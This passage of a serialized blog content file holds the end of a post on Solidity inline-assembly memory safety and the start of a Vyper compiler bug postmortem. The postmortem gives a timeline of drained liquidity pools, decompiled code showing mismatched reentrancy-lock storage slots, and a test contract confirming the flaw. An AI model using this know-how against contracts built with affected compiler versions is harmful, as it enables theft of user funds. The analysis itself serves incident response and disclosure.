invariant.",{"type":25,"tag":34,"props":33833,"children":33834},{},[33835],{"type":25,"tag":38,"props":33836,"children":33837},{},[33838,33839,33844,33845,33850,33851,33856],{"type":31,"value":33425},{"type":25,"tag":82,"props":33840,"children":33842},{"className":33841},[],[33843],{"type":31,"value":33431},{"type":31,"value":33433},{"type":25,"tag":82,"props":33846,"children":33848},{"className":33847},[],[33849],{"type":31,"value":33439},{"type":31,"value":33441},{"type":25,"tag":82,"props":33852,"children":33854},{"className":33853},[],[33855],{"type":31,"value":17906},{"type":31,"value":179},{"type":25,"tag":38,"props":33858,"children":33859},{},[33860],{"type":31,"value":33861},"This makes sense. Without stricter guarantees by the programmer, memory-unsafe assembly can touch memory anywhere it wants. Because the optimizer no longer has this guarantee, it cannot use memory in any of its optimization passes.",{"type":25,"tag":26,"props":33863,"children":33865},{"id":33864},"undefined-behavior",[33866],{"type":31,"value":33867},"Undefined Behavior",{"type":25,"tag":38,"props":33869,"children":33870},{},[33871,33873,33878,33880,33885,33887,33893],{"type":31,"value":33872},"How strict is memory safety? When it comes to ",{"type":25,"tag":82,"props":33874,"children":33876},{"className":33875},[],[33877],{"type":31,"value":33331},{"type":31,"value":33879},", only touching memory after 0x80 seems to matter. Is ",{"type":25,"tag":82,"props":33881,"children":33883},{"className":33882},[],[33884],{"type":31,"value":32989},{"type":31,"value":33886}," annotated assembly that touches memory at ",{"type":25,"tag":82,"props":33888,"children":33890},{"className":33889},[],[33891],{"type":31,"value":33892},"[0x40, 0x7f]",{"type":31,"value":33894}," really safe?",{"type":25,"tag":38,"props":33896,"children":33897},{},[33898,33899,33906,33908,33913],{"type":31,"value":474},{"type":25,"tag":162,"props":33900,"children":33903},{"href":33901,"rel":33902},"https://buildmedia.readthedocs.org/media/pdf/solidity/develop/solidity.pdf",[166],[33904],{"type":31,"value":33905},"Solidity documentation",{"type":31,"value":33907}," mentions ",{"type":25,"tag":64,"props":33909,"children":33910},{},[33911],{"type":31,"value":33912},"undefined behavior",{"type":31,"value":33914}," three times.",{"type":25,"tag":6711,"props":33916,"children":33917},{},[33918,33923,33938],{"type":25,"tag":2043,"props":33919,"children":33920},{},[33921],{"type":31,"value":33922},"The existence of a dangling reference",{"type":25,"tag":2043,"props":33924,"children":33925},{},[33926,33928],{"type":31,"value":33927},"Using verbatim improperly",{"type":25,"tag":19431,"props":33929,"children":33930},{},[33931],{"type":25,"tag":162,"props":33932,"children":33936},{"href":33933,"ariaDescribedBy":33934,"dataFootnoteRef":7,"id":33935},"#user-content-fn-2",[19438],"user-content-fnref-2",[33937],{"type":31,"value":331},{"type":25,"tag":2043,"props":33939,"children":33940},{},[33941],{"type":31,"value":33942},"Violating the memory model with in-line assembly marked as \"memory-safe\".",{"type":25,"tag":38,"props":33944,"children":33945},{},[33946],{"type":31,"value":33947},"Why does this matter?",{"type":25,"tag":38,"props":33949,"children":33950},{},[33951,33953,33960,33962,33969],{"type":31,"value":33952},"Assumptions about the program code can enable powerful optimizations - that's why ",{"type":25,"tag":162,"props":33954,"children":33957},{"href":33955,"rel":33956},"https://kristerw.blogspot.com/2016/02/how-undefined-signed-overflow-enables.html",[166],[33958],{"type":31,"value":33959},"signed integer overflow is undefined",{"type":31,"value":33961},". Strictly following the compiler model is critical. Undefined behavior materializes as tricky bugs ",{"type":25,"tag":162,"props":33963,"children":33966},{"href":33964,"rel":33965},"https://blog.regehr.org/archives/1307",[166],[33967],{"type":31,"value":33968},"years down the line",{"type":31,"value":179},{"type":25,"tag":38,"props":33971,"children":33972},{},[33973,33975,33982,33983,33988],{"type":31,"value":33974},"Going back to Solidity, the specification makes ",{"type":25,"tag":162,"props":33976,"children":33979},{"href":33977,"rel":33978},"https://docs.soliditylang.org/en/latest/internals/layout_in_memory.html",[166],[33980],{"type":31,"value":33981},"it unambiguously clear",{"type":31,"value":22491},{"type":25,"tag":64,"props":33984,"children":33985},{},[33986],{"type":31,"value":33987},"Thou shalt not modify the zero slot",{"type":31,"value":179},{"type":25,"tag":34,"props":33990,"children":33991},{},[33992],{"type":25,"tag":38,"props":33993,"children":33994},{},[33995],{"type":31,"value":33996},"The zero slot is used as initial value for dynamic memory arrays and should never be written to (the free memory pointer points to 0x80 initially).",{"type":25,"tag":38,"props":33998,"children":33999},{},[34000,34002,34007],{"type":31,"value":34001},"Any code that touches the zero slot at 0x60 is very clearly violating the specification. Does this matter though? This is where the semantics between Solidity and YUL gets tricky. Recall that the zero slot is a construction ",{"type":25,"tag":64,"props":34003,"children":34004},{},[34005],{"type":31,"value":34006},"in Solidity",{"type":31,"value":179},{"type":25,"tag":38,"props":34009,"children":34010},{},[34011],{"type":31,"value":34012},"Even though there's no explicit guarantee that inline assembly will be emitted verbatim during generation",{"type":25,"tag":6711,"props":34014,"children":34015},{},[34016],{"type":25,"tag":2043,"props":34017,"children":34018},{},[34019,34021,34028],{"type":31,"value":34020},"It very clearly ",{"type":25,"tag":162,"props":34022,"children":34025},{"href":34023,"rel":34024},"https://github.com/ethereum/solidity/blob/a297a687261a1c634551b1dac0e36d4573c19afe/libsolidity/codegen/ir/IRGeneratorForStatements.cpp#L2216",[166],[34026],{"type":31,"value":34027},"holds true today",{"type":31,"value":179},{"type":25,"tag":206,"props":34030,"children":34032},{"className":33070,"code":34031,"language":33072,"meta":7,"style":7},"bool IRGeneratorForStatements::visit(InlineAssembly const& _inlineAsm)\n{\n    setLocation(_inlineAsm);\n    if (*_inlineAsm.annotation().hasMemoryEffects && !_inlineAsm.annotation().markedMemorySafe)\n        m_context.setMemoryUnsafeInlineAssemblySeen();\n    CopyTranslate bodyCopier{_inlineAsm.dialect(), m_context, _inlineAsm.annotation().externalReferences};\n\n    yul::Statement modified = bodyCopier(_inlineAsm.operations());`\n",[34033],{"type":25,"tag":82,"props":34034,"children":34035},{"__ignoreMap":7},[34036,34076,34083,34096,34168,34189,34240,34247],{"type":25,"tag":216,"props":34037,"children":34038},{"class":6922,"line":6923},[34039,34043,34048,34053,34057,34062,34067,34072],{"type":25,"tag":216,"props":34040,"children":34041},{"style":6936},[34042],{"type":31,"value":33646},{"type":25,"tag":216,"props":34044,"children":34045},{"style":6964},[34046],{"type":31,"value":34047}," IRGeneratorForStatements::",{"type":25,"tag":216,"props":34049,"children":34050},{"style":7047},[34051],{"type":31,"value":34052},"visit",{"type":25,"tag":216,"props":34054,"children":34055},{"style":6964},[34056],{"type":31,"value":1850},{"type":25,"tag":216,"props":34058,"children":34059},{"style":7375},[34060],{"type":31,"value":34061},"InlineAssembly",{"type":25,"tag":216,"props":34063,"children":34064},{"style":6936},[34065],{"type":31,"value":34066}," const&",{"type":25,"tag":216,"props":34068,"children":34069},{"style":6947},[34070],{"type":31,"value":34071}," _inlineAsm",{"type":25,"tag":216,"props":34073,"children":34074},{"style":6964},[34075],{"type":31,"value":7107},{"type":25,"tag":216,"props":34077,"children":34078},{"class":6922,"line":6769},[34079],{"type":25,"tag":216,"props":34080,"children":34081},{"style":6964},[34082],{"type":31,"value":14836},{"type":25,"tag":216,"props":34084,"children":34085},{"class":6922,"line":6778},[34086,34091],{"type":25,"tag":216,"props":34087,"children":34088},{"style":7047},[34089],{"type":31,"value":34090},"    setLocation",{"type":25,"tag":216,"props":34092,"children":34093},{"style":6964},[34094],{"type":31,"value":34095},"(_inlineAsm);\n",{"type":25,"tag":216,"props":34097,"children":34098},{"class":6922,"line":7005},[34099,34103,34107,34111,34116,34120,34125,34130,34135,34139,34143,34147,34151,34155,34159,34164],{"type":25,"tag":216,"props":34100,"children":34101},{"style":6973},[34102],{"type":31,"value":16235},{"type":25,"tag":216,"props":34104,"children":34105},{"style":6964},[34106],{"type":31,"value":7016},{"type":25,"tag":216,"props":34108,"children":34109},{"style":6953},[34110],{"type":31,"value":8519},{"type":25,"tag":216,"props":34112,"children":34113},{"style":6947},[34114],{"type":31,"value":34115},"_inlineAsm",{"type":25,"tag":216,"props":34117,"children":34118},{"style":6964},[34119],{"type":31,"value":179},{"type":25,"tag":216,"props":34121,"children":34122},{"style":7047},[34123],{"type":31,"value":34124},"annotation",{"type":25,"tag":216,"props":34126,"children":34127},{"style":6964},[34128],{"type":31,"value":34129},"().",{"type":25,"tag":216,"props":34131,"children":34132},{"style":6947},[34133],{"type":31,"value":34134},"hasMemoryEffects",{"type":25,"tag":216,"props":34136,"children":34137},{"style":6953},[34138],{"type":31,"value":18142},{"type":25,"tag":216,"props":34140,"children":34141},{"style":6953},[34142],{"type":31,"value":16820},{"type":25,"tag":216,"props":34144,"children":34145},{"style":6947},[34146],{"type":31,"value":34115},{"type":25,"tag":216,"props":34148,"children":34149},{"style":6964},[34150],{"type":31,"value":179},{"type":25,"tag":216,"props":34152,"children":34153},{"style":7047},[34154],{"type":31,"value":34124},{"type":25,"tag":216,"props":34156,"children":34157},{"style":6964},[34158],{"type":31,"value":34129},{"type":25,"tag":216,"props":34160,"children":34161},{"style":6947},[34162],{"type":31,"value":34163},"markedMemorySafe",{"type":25,"tag":216,"props":34165,"children":34166},{"style":6964},[34167],{"type":31,"value":7107},{"type":25,"tag":216,"props":34169,"children":34170},{"class":6922,"line":7110},[34171,34176,34180,34185],{"type":25,"tag":216,"props":34172,"children":34173},{"style":6947},[34174],{"type":31,"value":34175},"        m_context",{"type":25,"tag":216,"props":34177,"children":34178},{"style":6964},[34179],{"type":31,"value":179},{"type":25,"tag":216,"props":34181,"children":34182},{"style":7047},[34183],{"type":31,"value":34184},"setMemoryUnsafeInlineAssemblySeen",{"type":25,"tag":216,"props":34186,"children":34187},{"style":6964},[34188],{"type":31,"value":7633},{"type":25,"tag":216,"props":34190,"children":34191},{"class":6922,"line":7216},[34192,34197,34201,34205,34210,34215,34219,34223,34227,34231,34236],{"type":25,"tag":216,"props":34193,"children":34194},{"style":6964},[34195],{"type":31,"value":34196},"    CopyTranslate bodyCopier{",{"type":25,"tag":216,"props":34198,"children":34199},{"style":6947},[34200],{"type":31,"value":34115},{"type":25,"tag":216,"props":34202,"children":34203},{"style":6964},[34204],{"type":31,"value":179},{"type":25,"tag":216,"props":34206,"children":34207},{"style":7047},[34208],{"type":31,"value":34209},"dialect",{"type":25,"tag":216,"props":34211,"children":34212},{"style":6964},[34213],{"type":31,"value":34214},"(), m_context, ",{"type":25,"tag":216,"props":34216,"children":34217},{"style":6947},[34218],{"type":31,"value":34115},{"type":25,"tag":216,"props":34220,"children":34221},{"style":6964},[34222],{"type":31,"value":179},{"type":25,"tag":216,"props":34224,"children":34225},{"style":7047},[34226],{"type":31,"value":34124},{"type":25,"tag":216,"props":34228,"children":34229},{"style":6964},[34230],{"type":31,"value":34129},{"type":25,"tag":216,"props":34232,"children":34233},{"style":6947},[34234],{"type":31,"value":34235},"externalReferences",{"type":25,"tag":216,"props":34237,"children":34238},{"style":6964},[34239],{"type":31,"value":20536},{"type":25,"tag":216,"props":34241,"children":34242},{"class":6922,"line":7244},[34243],{"type":25,"tag":216,"props":34244,"children":34245},{"emptyLinePlaceholder":16},[34246],{"type":31,"value":7642},{"type":25,"tag":216,"props":34248,"children":34249},{"class":6922,"line":7257},[34250,34255,34259,34264,34268,34272,34276,34281],{"type":25,"tag":216,"props":34251,"children":34252},{"style":6964},[34253],{"type":31,"value":34254},"    yul::Statement modified ",{"type":25,"tag":216,"props":34256,"children":34257},{"style":6953},[34258],{"type":31,"value":266},{"type":25,"tag":216,"props":34260,"children":34261},{"style":7047},[34262],{"type":31,"value":34263}," bodyCopier",{"type":25,"tag":216,"props":34265,"children":34266},{"style":6964},[34267],{"type":31,"value":1850},{"type":25,"tag":216,"props":34269,"children":34270},{"style":6947},[34271],{"type":31,"value":34115},{"type":25,"tag":216,"props":34273,"children":34274},{"style":6964},[34275],{"type":31,"value":179},{"type":25,"tag":216,"props":34277,"children":34278},{"style":7047},[34279],{"type":31,"value":34280},"operations",{"type":25,"tag":216,"props":34282,"children":34283},{"style":6964},[34284],{"type":31,"value":34285},"());`\n",{"type":25,"tag":6711,"props":34287,"children":34288},{"start":6769},[34289],{"type":25,"tag":2043,"props":34290,"children":34291},{},[34292],{"type":31,"value":34293},"It would require a pretty contrived compiler implementation to meaningfully modify assembly statements before optimization.",{"type":25,"tag":38,"props":34295,"children":34296},{},[34297],{"type":31,"value":34298},"As long as the invariants are upheld before and after the assembly block executes, the code is probably safe.",{"type":25,"tag":26,"props":34300,"children":34301},{"id":9258},[34302],{"type":31,"value":9261},{"type":25,"tag":38,"props":34304,"children":34305},{},[34306],{"type":31,"value":34307},"In this blog post, we present an exploration of the Solidity compiler. This aims to serve as a useful reference for the inquisitive. Compilers are extremely complex with implicit and explicit assumptions. When in doubt, read the source code. So what exactly is memory safety?",{"type":25,"tag":38,"props":34309,"children":34310},{},[34311],{"type":31,"value":34312},"It's a promise between YUL generation and optimization.",{"type":25,"tag":22381,"props":34314,"children":34316},{"className":34315,"dataFootnotes":7},[22384],[34317,34322],{"type":25,"tag":26,"props":34318,"children":34320},{"className":34319,"id":19438},[22389],[34321],{"type":31,"value":22392},{"type":25,"tag":6711,"props":34323,"children":34324},{},[34325,34359],{"type":25,"tag":2043,"props":34326,"children":34328},{"id":34327},"user-content-fn-1",[34329,34331,34336,34338,34344,34346,34351,34353],{"type":31,"value":34330},"As an interesting aside, ",{"type":25,"tag":82,"props":34332,"children":34334},{"className":34333},[],[34335],{"type":31,"value":33331},{"type":31,"value":34337}," is an opaque function which prevents optimizations from reasoning about the free memory pointer. This leads to some rather counterintitive behavior -- ",{"type":25,"tag":82,"props":34339,"children":34341},{"className":34340},[],[34342],{"type":31,"value":34343},"memory-unsafe",{"type":31,"value":34345}," code can ",{"type":25,"tag":64,"props":34347,"children":34348},{},[34349],{"type":31,"value":34350},"decrease",{"type":31,"value":34352}," gas consumption, especially in the YUL header. ",{"type":25,"tag":162,"props":34354,"children":34357},{"href":34355,"ariaLabel":22495,"className":34356,"dataFootnoteBackref":7},"#user-content-fnref-1",[22497],[34358],{"type":31,"value":22500},{"type":25,"tag":2043,"props":34360,"children":34362},{"id":34361},"user-content-fn-2",[34363,34365,34370,34372],{"type":31,"value":34364},"Unfortunately the documentation only presents a \"non-exhaustive list of restrictions\" on verbatim bytecode. In practice, it seems hard to ",{"type":25,"tag":64,"props":34366,"children":34367},{},[34368],{"type":31,"value":34369},"guarantee",{"type":31,"value":34371}," behavior with opaque bytes. ",{"type":25,"tag":162,"props":34373,"children":34376},{"href":34374,"ariaLabel":22515,"className":34375,"dataFootnoteBackref":7},"#user-content-fnref-2",[22497],[34377],{"type":31,"value":22500},{"type":25,"tag":9316,"props":34379,"children":34380},{},[34381],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":34383},[34384,34385,34386,34387,34388,34389,34390],{"id":32975,"depth":6769,"text":32978},{"id":33029,"depth":6769,"text":33032},{"id":33293,"depth":6769,"text":33296},{"id":33024,"depth":6769,"text":33517},{"id":33864,"depth":6769,"text":33867},{"id":9258,"depth":6769,"text":9261},{"id":19438,"depth":6769,"text":22392},"content:blog:2023-07-28-solidity-compilers-memory-safety.md","blog/2023-07-28-solidity-compilers-memory-safety.md","blog/2023-07-28-solidity-compilers-memory-safety",{"_path":34395,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":34396,"description":34397,"author":9670,"image":34398,"date":34400,"isFeatured":16,"onBlogPage":16,"tags":34401,"body":34403,"_type":6798,"_id":35154,"_source":6800,"_file":35155,"_stem":35156,"_extension":6803},"/blog/2023-08-01-vyper-timeline","Vyper Hack Timeline","A timeline and postmortem for the Vyper compiler bug. Thoughts on trust assumptions, vulnerability disclosures, and whitehack recoveries.",{"src":34399,"height":17580,"width":17580},"/posts/vyper-timeline/header.jpg","2023-08-01",[34402,32970],"vyper",{"type":22,"children":34404,"toc":35145},[34405,34410,34415,34420,34426,34431,34449,34459,34464,34472,34482,34501,34581,34591,34751,34756,34761,34771,34778,34783,34788,34802,34807,34824,34841,34860,34870,34883,34888,34901,34906,34911,34921,34948,34958,34988,34994,35003,35009,35014,35019,35024,35030,35035,35049,35054,35059,35064,35070,35075,35088,35114,35119,35141],{"type":25,"tag":38,"props":34406,"children":34407},{},[34408],{"type":31,"value":34409},"\"Trust but verify\" is a common adage. \"Hindsight is 20/20\" is another one. The best bugs are those hiding in plain sight.",{"type":25,"tag":38,"props":34411,"children":34412},{},[34413],{"type":31,"value":34414},"Compiler bugs are located deep in the supply chain, making their effects far more widespread than normal protocol bugs. Numerous contracts across different chains were compiled with vulnerable Vyper versions - it was a race against blackhats.",{"type":25,"tag":38,"props":34416,"children":34417},{},[34418],{"type":31,"value":34419},"Here's how it all happened.",{"type":25,"tag":26,"props":34421,"children":34423},{"id":34422},"timeline",[34424],{"type":31,"value":34425},"Timeline",{"type":25,"tag":38,"props":34427,"children":34428},{},[34429],{"type":31,"value":34430},"As a note, I'll use the \"we\" pronoun loosely here. I think I personally made some insightful contributions towards the initial vulnerability discovery but countless others helped far more throughout the entire process.",{"type":25,"tag":38,"props":34432,"children":34433},{},[34434,34439,34441,34448],{"type":25,"tag":9273,"props":34435,"children":34436},{},[34437],{"type":31,"value":34438},"13:10 UTC",{"type":31,"value":34440}," pETH/ETH was ",{"type":25,"tag":162,"props":34442,"children":34445},{"href":34443,"rel":34444},"https://etherscan.io/tx/0xa84aa065ce61dbb1eb50ab6ae67fc31a9da50dd2c74eefd561661bfce2f1620c",[166],[34446],{"type":31,"value":34447},"drained of $11M",{"type":31,"value":179},{"type":25,"tag":38,"props":34450,"children":34451},{},[34452,34457],{"type":25,"tag":9273,"props":34453,"children":34454},{},[34455],{"type":31,"value":34456},"13:19 UTC",{"type":31,"value":34458}," Michal posted in ETHSecurity about a sudden drop in pETH price.",{"type":25,"tag":38,"props":34460,"children":34461},{},[34462],{"type":31,"value":34463},"Igor first noticed something was off. Thanks to him, we dug deeper.",{"type":25,"tag":34,"props":34465,"children":34466},{},[34467],{"type":25,"tag":38,"props":34468,"children":34469},{},[34470],{"type":31,"value":34471},"But how did the bot reenter into add_liquidity() from remove_liquidity()?",{"type":25,"tag":38,"props":34473,"children":34474},{},[34475,34480],{"type":25,"tag":9273,"props":34476,"children":34477},{},[34478],{"type":31,"value":34479},"14:01 UTC",{"type":31,"value":34481}," A warroom was formed around this comment.",{"type":25,"tag":38,"props":34483,"children":34484},{},[34485,34490,34492,34499],{"type":25,"tag":9273,"props":34486,"children":34487},{},[34488],{"type":31,"value":34489},"14:07 UTC",{"type":31,"value":34491}," We decompiled the JPEGd contract ",{"type":25,"tag":162,"props":34493,"children":34496},{"href":34494,"rel":34495},"https://ethervm.io/decompile",[166],[34497],{"type":31,"value":34498},"with our favorite decompiler",{"type":31,"value":34500}," and noted a difference in reentrancy guard storage slot.",{"type":25,"tag":206,"props":34502,"children":34506},{"className":34503,"code":34504,"language":34505,"meta":7,"style":7},"language-yul shiki shiki-themes slack-dark","// Dispatch table entry for add_liquidity(uint256[2],uint256)\nlabel_0057:\n    if (storage[0x00]) { revert(memory[0x00:0x00]); }\n    storage[0x00] = 0x01;\n\n// Dispatch table entry for remove_liquidity(uint256,uint256[2])\nlabel_1AF3:\n    if (storage[0x02]) { revert(memory[0x00:0x00]); }\n    storage[0x02] = 0x01;\n","yul",[34507],{"type":25,"tag":82,"props":34508,"children":34509},{"__ignoreMap":7},[34510,34518,34526,34534,34542,34549,34557,34565,34573],{"type":25,"tag":216,"props":34511,"children":34512},{"class":6922,"line":6923},[34513],{"type":25,"tag":216,"props":34514,"children":34515},{},[34516],{"type":31,"value":34517},"// Dispatch table entry for add_liquidity(uint256[2],uint256)\n",{"type":25,"tag":216,"props":34519,"children":34520},{"class":6922,"line":6769},[34521],{"type":25,"tag":216,"props":34522,"children":34523},{},[34524],{"type":31,"value":34525},"label_0057:\n",{"type":25,"tag":216,"props":34527,"children":34528},{"class":6922,"line":6778},[34529],{"type":25,"tag":216,"props":34530,"children":34531},{},[34532],{"type":31,"value":34533},"    if (storage[0x00]) { revert(memory[0x00:0x00]); }\n",{"type":25,"tag":216,"props":34535,"children":34536},{"class":6922,"line":7005},[34537],{"type":25,"tag":216,"props":34538,"children":34539},{},[34540],{"type":31,"value":34541},"    storage[0x00] = 0x01;\n",{"type":25,"tag":216,"props":34543,"children":34544},{"class":6922,"line":7110},[34545],{"type":25,"tag":216,"props":34546,"children":34547},{"emptyLinePlaceholder":16},[34548],{"type":31,"value":7642},{"type":25,"tag":216,"props":34550,"children":34551},{"class":6922,"line":7216},[34552],{"type":25,"tag":216,"props":34553,"children":34554},{},[34555],{"type":31,"value":34556},"// Dispatch table entry for remove_liquidity(uint256,uint256[2])\n",{"type":25,"tag":216,"props":34558,"children":34559},{"class":6922,"line":7244},[34560],{"type":25,"tag":216,"props":34561,"children":34562},{},[34563],{"type":31,"value":34564},"label_1AF3:\n",{"type":25,"tag":216,"props":34566,"children":34567},{"class":6922,"line":7257},[34568],{"type":25,"tag":216,"props":34569,"children":34570},{},[34571],{"type":31,"value":34572},"    if (storage[0x02]) { revert(memory[0x00:0x00]); }\n",{"type":25,"tag":216,"props":34574,"children":34575},{"class":6922,"line":7275},[34576],{"type":25,"tag":216,"props":34577,"children":34578},{},[34579],{"type":31,"value":34580},"    storage[0x02] = 0x01;\n",{"type":25,"tag":38,"props":34582,"children":34583},{},[34584,34589],{"type":25,"tag":9273,"props":34585,"children":34586},{},[34587],{"type":31,"value":34588},"14:27 UTC",{"type":31,"value":34590}," We confirmed this behavior with a simple local test contract.",{"type":25,"tag":206,"props":34592,"children":34594},{"className":23421,"code":34593,"language":23420,"meta":7,"style":7},"@external\n@nonreentrant(\"lock\")\ndef test(addr: address) -> bool:\n    return True\n\n@external\n@nonreentrant(\"lock\")\ndef test2(addr: address) -> bool:\n    return False\n",[34595],{"type":25,"tag":82,"props":34596,"children":34597},{"__ignoreMap":7},[34598,34606,34627,34662,34674,34681,34688,34707,34739],{"type":25,"tag":216,"props":34599,"children":34600},{"class":6922,"line":6923},[34601],{"type":25,"tag":216,"props":34602,"children":34603},{"style":7047},[34604],{"type":31,"value":34605},"@external\n",{"type":25,"tag":216,"props":34607,"children":34608},{"class":6922,"line":6769},[34609,34614,34618,34623],{"type":25,"tag":216,"props":34610,"children":34611},{"style":7047},[34612],{"type":31,"value":34613},"@nonreentrant",{"type":25,"tag":216,"props":34615,"children":34616},{"style":6964},[34617],{"type":31,"value":1850},{"type":25,"tag":216,"props":34619,"children":34620},{"style":8205},[34621],{"type":31,"value":34622},"\"lock\"",{"type":25,"tag":216,"props":34624,"children":34625},{"style":6964},[34626],{"type":31,"value":7107},{"type":25,"tag":216,"props":34628,"children":34629},{"class":6922,"line":6778},[34630,34635,34640,34644,34649,34654,34658],{"type":25,"tag":216,"props":34631,"children":34632},{"style":6936},[34633],{"type":31,"value":34634},"def",{"type":25,"tag":216,"props":34636,"children":34637},{"style":7047},[34638],{"type":31,"value":34639}," test",{"type":25,"tag":216,"props":34641,"children":34642},{"style":6964},[34643],{"type":31,"value":1850},{"type":25,"tag":216,"props":34645,"children":34646},{"style":6947},[34647],{"type":31,"value":34648},"addr",{"type":25,"tag":216,"props":34650,"children":34651},{"style":6964},[34652],{"type":31,"value":34653},": address) -> ",{"type":25,"tag":216,"props":34655,"children":34656},{"style":7375},[34657],{"type":31,"value":33646},{"type":25,"tag":216,"props":34659,"children":34660},{"style":6964},[34661],{"type":31,"value":9518},{"type":25,"tag":216,"props":34663,"children":34664},{"class":6922,"line":7005},[34665,34669],{"type":25,"tag":216,"props":34666,"children":34667},{"style":6973},[34668],{"type":31,"value":20947},{"type":25,"tag":216,"props":34670,"children":34671},{"style":6936},[34672],{"type":31,"value":34673}," True\n",{"type":25,"tag":216,"props":34675,"children":34676},{"class":6922,"line":7110},[34677],{"type":25,"tag":216,"props":34678,"children":34679},{"emptyLinePlaceholder":16},[34680],{"type":31,"value":7642},{"type":25,"tag":216,"props":34682,"children":34683},{"class":6922,"line":7216},[34684],{"type":25,"tag":216,"props":34685,"children":34686},{"style":7047},[34687],{"type":31,"value":34605},{"type":25,"tag":216,"props":34689,"children":34690},{"class":6922,"line":7244},[34691,34695,34699,34703],{"type":25,"tag":216,"props":34692,"children":34693},{"style":7047},[34694],{"type":31,"value":34613},{"type":25,"tag":216,"props":34696,"children":34697},{"style":6964},[34698],{"type":31,"value":1850},{"type":25,"tag":216,"props":34700,"children":34701},{"style":8205},[34702],{"type":31,"value":34622},{"type":25,"tag":216,"props":34704,"children":34705},{"style":6964},[34706],{"type":31,"value":7107},{"type":25,"tag":216,"props":34708,"children":34709},{"class":6922,"line":7257},[34710,34714,34719,34723,34727,34731,34735],{"type":25,"tag":216,"props":34711,"children":34712},{"style":6936},[34713],{"type":31,"value":34634},{"type":25,"tag":216,"props":34715,"children":34716},{"style":7047},[34717],{"type":31,"value":34718}," test2",{"type":25,"tag":216,"props":34720,"children":34721},{"style":6964},[34722],{"type":31,"value":1850},{"type":25,"tag":216,"props":34724,"children":34725},{"style":6947},[34726],{"type":31,"value":34648},{"type":25,"tag":216,"props":34728,"children":34729},{"style":6964},[34730],{"type":31,"value":34653},{"type":25,"tag":216,"props":34732,"children":34733},{"style":7375},[34734],{"type":31,"value":33646},{"type":25,"tag":216,"props":34736,"children":34737},{"style":6964},[34738],{"type":31,"value":9518},{"type":25,"tag":216,"props":34740,"children":34741},{"class":6922,"line":7275},[34742,34746],{"type":25,"tag":216,"props":34743,"children":34744},{"style":6973},[34745],{"type":31,"value":20947},{"type":25,"tag":216,"props":34747,"children":34748},{"style":6936},[34749],{"type":31,"value":34750}," False\n",{"type":25,"tag":38,"props":34752,"children":34753},{},[34754],{"type":31,"value":34755},"This was not just another reentrancy bug.",{"type":25,"tag":38,"props":34757,"children":34758},{},[34759],{"type":31,"value":34760},"At this point, we realized just how impactful this would be. There was a blackout of information, and we deleted public messages on the nature of the vulnerability.",{"type":25,"tag":38,"props":34762,"children":34763},{},[34764,34769],{"type":25,"tag":9273,"props":34765,"children":34766},{},[34767],{"type":31,"value":34768},"14:37 UTC",{"type":31,"value":34770}," Wavey helped identify the vulnerable commit and affected versions. This was also confirmed by me and Charles by manually inspecting the Vyper compiler output.",{"type":25,"tag":38,"props":34772,"children":34773},{},[34774],{"type":25,"tag":6467,"props":34775,"children":34777},{"alt":7,"src":34776},"/posts/vyper-timeline/sstore.png",[],{"type":25,"tag":38,"props":34779,"children":34780},{},[34781],{"type":31,"value":34782},"It was a race with the hackers.",{"type":25,"tag":38,"props":34784,"children":34785},{},[34786],{"type":31,"value":34787},"Thankfully, people were still confusing this for read-only reentrancy. Taken from the \"Web3 Security Alerts\" channel.",{"type":25,"tag":34,"props":34789,"children":34790},{},[34791],{"type":25,"tag":38,"props":34792,"children":34793},{},[34794,34796],{"type":31,"value":34795},"Alchemix and Metronome DAO also been hacked due to this read-only reentrancy bug: ",{"type":25,"tag":162,"props":34797,"children":34800},{"href":34798,"rel":34799},"https://twitter.com/hexagate_/status/1685677801813217280",[166],[34801],{"type":31,"value":34798},{"type":25,"tag":38,"props":34803,"children":34804},{},[34805],{"type":31,"value":34806},"Michael identified alETH and msETH pools, which were also running 0.2.15, as being also potentially vulnerable.",{"type":25,"tag":38,"props":34808,"children":34809},{},[34810,34815,34816,34823],{"type":25,"tag":9273,"props":34811,"children":34812},{},[34813],{"type":31,"value":34814},"14:50 UTC",{"type":31,"value":10409},{"type":25,"tag":162,"props":34817,"children":34820},{"href":34818,"rel":34819},"https://etherscan.io/tx/0xc93eb238ff42632525e990119d3edc7775299a70b56e54d83ec4f53736400964",[166],[34821],{"type":31,"value":34822},"msETH/ETH was drained",{"type":31,"value":179},{"type":25,"tag":38,"props":34825,"children":34826},{},[34827,34832,34833,34840],{"type":25,"tag":9273,"props":34828,"children":34829},{},[34830],{"type":31,"value":34831},"15:34 UTC",{"type":31,"value":10409},{"type":25,"tag":162,"props":34834,"children":34837},{"href":34835,"rel":34836},"https://etherscan.io/tx/0xb676d789bb8b66a08105c844a49c2bcffb400e5c1cfabd4bc30cca4bff3c9801",[166],[34838],{"type":31,"value":34839},"alETH/ETH was drained",{"type":31,"value":179},{"type":25,"tag":38,"props":34842,"children":34843},{},[34844,34849,34851,34858],{"type":25,"tag":9273,"props":34845,"children":34846},{},[34847],{"type":31,"value":34848},"15:43 UTC",{"type":31,"value":34850}," We identified that ",{"type":25,"tag":162,"props":34852,"children":34855},{"href":34853,"rel":34854},"https://etherscan.io/address/0x8301AE4fc9c624d1D396cbDAa1ed877821D7C511#code",[166],[34856],{"type":31,"value":34857},"CRV/ETH was vulnerable",{"type":31,"value":34859},", compiled using Vyper version 3.0.0. It was critical that we kept the nature of affected contracts secret for as long as possible.",{"type":25,"tag":38,"props":34861,"children":34862},{},[34863,34868],{"type":25,"tag":9273,"props":34864,"children":34865},{},[34866],{"type":31,"value":34867},"16:11 UTC",{"type":31,"value":34869}," We began working on a whitehat exploit.",{"type":25,"tag":38,"props":34871,"children":34872},{},[34873,34875,34882],{"type":31,"value":34874},"Unfortunately, too many groups were doing independent research in parallel and rumors were spreading. At 16:44 UTC, we decided to release a ",{"type":25,"tag":162,"props":34876,"children":34879},{"href":34877,"rel":34878},"https://twitter.com/vyperlang/status/1685692973051498497",[166],[34880],{"type":31,"value":34881},"public statement on affected versions",{"type":31,"value":179},{"type":25,"tag":38,"props":34884,"children":34885},{},[34886],{"type":31,"value":34887},"By 18:32 UTC, we had a proof of concept exploit to be used in a potential whitehat recovery. bpak from Chainlight was also working on an exploit in parallel, and shared it at 19:06 UTC.",{"type":25,"tag":38,"props":34889,"children":34890},{},[34891,34893,34900],{"type":31,"value":34892},"Five minutes later at 19:11 UTC, 